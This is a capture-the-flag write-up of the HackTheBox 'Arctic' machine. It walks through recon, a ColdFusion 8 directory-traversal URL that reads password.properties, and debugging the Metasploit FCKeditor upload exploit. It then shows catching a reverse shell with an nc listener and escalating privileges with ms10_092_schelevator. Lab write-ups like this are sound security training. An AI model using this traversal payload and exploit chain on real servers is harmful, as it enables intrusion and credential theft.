Arctic


HackTheBox

Arctic Challenge - HackTheBox

This writeup is for one of the Retired boxes on HackTheBox called Arctic [1].

Step 1 - Recon & Enumeration

I started with Nmap, UDP Proto Scanner, Nikto and Dirbuster. Starting with Nmap we have nmap -sSV -A -T4 10.10.10.11



Step 2 - Exploitation

Based on the results, I went first to check if there was any metasploit module to use on port 135 (msrpc). MSRPC is the Microsof Remote Procedure Call and there is a well known exploit on Metasploit for it, MS03_026_DCOM - exploit/windows/dcerpc/ms03_026_dcom - but it's for Windows NT/2000/XP/2003.

So, I then moved on to port 8500. Accessing port 8500 there is a Coldfusion 8 Application. At the time, I had not played with a Coldfusion App before, so I went to look for information on how to exploit it. [2]

So, what is ColdFusion?

ColdFusion is a web application development platform. The programming language used with that platform is also commonly called ColdFusion, but the correct name of it is ColdFusion Markup Language (CFML). So, Coldfusion handles CFML pages.

At the time there was only one Coldfusion exploit in Metasploit for version 8, but there was no success.

I tried:

 1. Directory Traversal in
 http://[HOSTNAME:PORT]/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%en
 2. Brute Force password in http://10.10.10.11:8500/CFIDE/componentutils/login.cfm?
But the Coldfusion 8 FCKeditor exploit was stuck in my mind and I couldn't believe why it wasn't working. As a result, I decided to take another look at it and try to figure out the reasons why the exploit was not working.



Debugging Exploits

So, there are three ways to check what's going wrong with your metasploit exploit.

  1. In Metasploit set VERBOSE true
  2. Open Wireshark and check the network traffic
  3. Intercept the Request with Burp Suite and check the Response

The first one didn't help at all. I used set VERBOSE true but Metasploit didn't give me any extra information. However, I was able to find out what's wrong using Wireshark first and then with Burp Suite.

Wireshark - Steps
 1. Fire Wireshark and monitor your traffic in tun0
 2. Set your exploit in Metasploit, as shown in the Image above
 3. Hit exploit and watch the traffic in Wireshark

Focus on the 2 HTTP Packets, the first one is our Request (payload) and the second is the Response, which gives a 200. Now, go on and right click on the HTTP Response, Follow -> HTTP Stream, in order to see what's going on.

Request


Response


So, we do get a 200 HTTP Response saying that our shell is uploaded but the path is a bit weird, /userfiles/file/FAOX.jsp/EQ0JQKNF.txt instead of userfiles/file/FAOX.jsp. So, what will happen if I access userfiles/file/FAOX.jsp - Is my shell going to be executed?

I fired a terminal using nc -lvp 1233 and accessed

http://10.10.10.11:8500/userfiles/file/FAOX.jsp


Boom reverse shell and user flag!!

Burp Suite - Steps

You could also intercept the request and check what's going on using Burp Suite too.

 1. In Metasploit set the RHOST as 127.0.0.1 and RPORT as 8500 (Image 1)
 2. Open Burp Suite and go to Intercept - Options - Proxy Listeners - Add - Loopback only and Bind to Port 8500 (Image 2)
 3. Then go to the next Tab (Request Handling) - Redirect to Host - Redirect to Port and enter 10.10.10.11:8500 (Image 3)

Image 1

Image 2

Image 3

So, what we are doing here is sending our request to 127.0.0.1:8500 and then redirecting it to 10.10.10.11:8500. As a result, we can intercept the request from Metasploit, modify it, forward it and check the response.

Step 3 - From User to Admin

So now we have a reverse shell as user tolis, how do we go from that to Admin?

First of all, I noticed that my shell kept breaking and I wanted to fire a meterpreter one in order to run scripts like post/multi/recon/local_exploit_suggester. However, initially my problem was that the box was a 64bit one and I was using a 32bit reverse tcp shell. Luckily, following this tutorial [5] I was able to create a solid shell and then use meterpreter.

Next, I used run post/multi/recon/local_exploit_suggester and it gave me only one exploit ms10_092_schelevator. I fired it up and I got system...



References

[1] HackTheBox
[2] ColdFusion for Pentesters
[3] Attacking Adobe ColdFusion
[4] LFI to Shell in ColdFusion 6-10
[5] Remote shell using Meterpreter and Powershell